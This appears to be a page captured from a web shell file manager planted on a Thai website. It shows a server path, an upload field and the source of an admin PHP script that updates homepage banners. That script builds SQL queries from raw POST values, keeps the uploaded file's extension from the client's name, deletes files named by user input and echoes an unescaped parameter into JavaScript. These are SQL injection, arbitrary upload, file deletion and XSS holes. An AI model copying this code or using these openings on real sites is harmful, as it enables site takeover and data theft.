MINI MINI MANI MO

Path : /home/phaetpan/domains/phaetpanya.com/public_html/vibharamadmin/
File Upload :
Current File : /home/phaetpan/domains/phaetpanya.com/public_html/vibharamadmin/saveedit_banner5.php

<html>
<body>
<?php
	include("connect.php");
	
	$img5 = $_POST["img5"];
	if($img5 != "") 
	{
		if($_FILES["filUpload"]["name"] != "") 
		{
			date_default_timezone_set('Asia/Bangkok');
			$time = date("His");
			$date = date("Ymd");
			$type = substr($_FILES['filUpload']['name'],-4);
			$name = $date.$time.$type;         
			if(move_uploaded_file($_FILES["filUpload"]["tmp_name"],"../upload_file/$name"))
			{
				$picDelete = unlink("../upload_file/$img5");
				$strSQL = "UPDATE home_banner SET 
				img5 = '".$name."',admin_id = '".$_POST["admin"]."' 
				WHERE banner_id = '".$_POST["banner_id"]."'";
				$objQuery = mysqli_query($objCon,$strSQL);
			}
		}
	}else{
		if($_FILES["filUpload"]["name"] != "") 
		{
			date_default_timezone_set('Asia/Bangkok');
			$time = date("His");
			$date = date("Ymd");
			$type = substr($_FILES['filUpload']['name'],-4);
			$name = $date.$time.$type;         
			if(move_uploaded_file($_FILES["filUpload"]["tmp_name"],"../upload_file/$name"))
			{
				$strSQL = "UPDATE home_banner SET 
				img5 = '".$name."',admin_id = '".$_POST["admin"]."' 
				WHERE banner_id = '".$_POST["banner_id"]."'";
				$objQuery = mysqli_query($objCon,$strSQL);
			}
		}
	}
	$strSQL = "UPDATE home_banner SET 
			title5 = '".$_POST["title5"]."',sub5 = '".$_POST["sub5"]."',admin_id = '".$_POST["admin"]."'
			WHERE banner_id = '".$_POST["banner_id"]."' ";
			$objQuery = mysqli_query($objCon,$strSQL);

?>
</body>
	<script type='text/javascript'>
		window.location.href = "edit_banner.php?banner_id=<?php echo $_POST["banner_id"];?>"
	</script>
</html>

OHA YOOOO